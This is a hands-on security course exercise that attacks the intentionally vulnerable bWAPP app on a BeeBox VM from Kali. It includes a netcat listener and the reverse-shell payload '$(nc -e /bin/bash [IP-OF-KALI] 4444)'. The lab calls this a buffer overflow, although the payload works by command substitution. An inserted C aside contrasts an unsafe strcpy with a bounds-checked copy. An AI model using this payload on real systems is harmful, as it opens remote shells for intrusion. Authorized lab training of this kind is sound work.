Buffer overflow exploit

Difficulty

  • intermediate

Average duration

2 hrs

By @rosinni and other contributors at 4Geeks Academy


🌱 How to Start This Project?

The aim of this exercise is to learn how to identify and exploit buffer overflow vulnerabilities. Through this project, you will understand how buffer overflows can be used to execute arbitrary code, and you will apply exploitation techniques to compromise the security of the application.

Requirements

  • Kali Machine (attacker)
  • BeeBox Machine

📝 Instructions

  1. Verify that both Kali Linux and BeeBox are connected to the same network. You can do this by checking the IP addresses assigned to each machine and ensuring they can communicate with each other.

  2. Check connectivity. From Kali, try pinging BeeBox and vice versa to confirm that the network connection is working.

    ping [IP-OF-BEEBOX]
    ping [IP-OF-KALI]

  3. Log in to the BeeBox machine.

Verify Buffer Overflow Vulnerability

  1. Enter a movie name that is in the bWAPP database (e.g., Hulk, Iron Man).

  2. Then enter a movie name that is not in the database (e.g., Harry Potter).

  3. Run the following command to view the contents of the bof_1.php file:

    cat /var/www/bWAPP/bof_1.php

    The goal is to understand how the movie title input is handled and how it is passed as a command-line argument to the application. Look for signs of buffer overflow.
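The kind of code to look for when tracing how the title reaches the application, as an added example that is not bWAPP's or the course's own code: a hypothetical C lookup routine with the unbounded copy beside a bounds-checked version. `lookup_unsafe`, `lookup_safe` and `TITLE_MAX` are names and a buffer size assumed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define TITLE_MAX 64   /* assumed buffer size, chosen for illustration */

/* Vulnerable form: no length check, so any argument longer than
 * TITLE_MAX - 1 bytes is written past the end of `title`. */
int lookup_unsafe(const char *arg)
{
    char title[TITLE_MAX];
    strcpy(title, arg);               /* unbounded copy: the defect */
    return (int)strlen(title);
}

/* Hardened form: measure first, copy only if the input fits.
 * Returns the title length, or -1 when the input is rejected. */
int lookup_safe(const char *arg, char *out, size_t out_size)
{
    size_t len = 0;
    if (arg == NULL || out == NULL || out_size == 0)
        return -1;
    while (len < out_size && arg[len] != '\0')
        len++;                        /* never reads past out_size bytes */
    if (len == out_size)
        return -1;                    /* no room left for the NUL */
    memcpy(out, arg, len + 1);        /* copy includes the NUL */
    return (int)len;
}

int main(int argc, char **argv)
{
    char title[TITLE_MAX];
    if (argc != 2) {
        fprintf(stderr, "usage: %s <title>\n", argv[0]);
        return 2;
    }
    if (lookup_safe(argv[1], title, sizeof title) < 0) {
        fprintf(stderr, "rejected: title exceeds %d bytes\n", TITLE_MAX - 1);
        return 1;
    }
    printf("searching for: %s\n", title);
    return 0;
}
```

The bounds check covers only the memory copy. A `$(...)` string is expanded by a shell before the program ever sees its argument, so the caller that builds the command line must also quote the title.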

Generate and Use the Exploit String

  1. Generate the exploit string by running the following command on Kali to create a string that will help identify the buffer overflow:

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 360

  2. Save the generated string in a file named pattern_chain.txt:

    echo "Aa0Aa1Aa2Aa3Aa4Aa5..." > pattern_chain.txt

  3. Start an HTTP server on Kali to transfer the file:

    python3 -m http.server 8080

  4. Download the pattern_chain.txt file on BeeBox using wget:

    wget http://[IP-OF-KALI]:8080/pattern_chain.txt

  5. Read the content of the downloaded file on BeeBox:

    cat pattern_chain.txt

Inject the Exploit String and Payload

  1. Use the string generated with pattern_create.rb in the field or parameter that may cause the buffer overflow in bWAPP.

    The goal is to see how the application responds to input that exceeds the expected size.

  2. Run a listener on Kali to receive the remote shell:

    nc -lvnp 4444

  3. To obtain a remote shell, inject the following payload into the field that causes the overflow:

    $(nc -e /bin/bash [IP-OF-KALI] 4444)

    Replace [IP-OF-KALI] with the IP address of your Kali machine.

  4. Confirm the connection on Kali. If the exploit is successful, you should see a connection in the Kali listener and receive a Bash prompt.

Check Server Logs

  1. Review the web server logs on BeeBox for any messages related to the buffer overflow:

    sudo cat /var/log/apache2/error.log
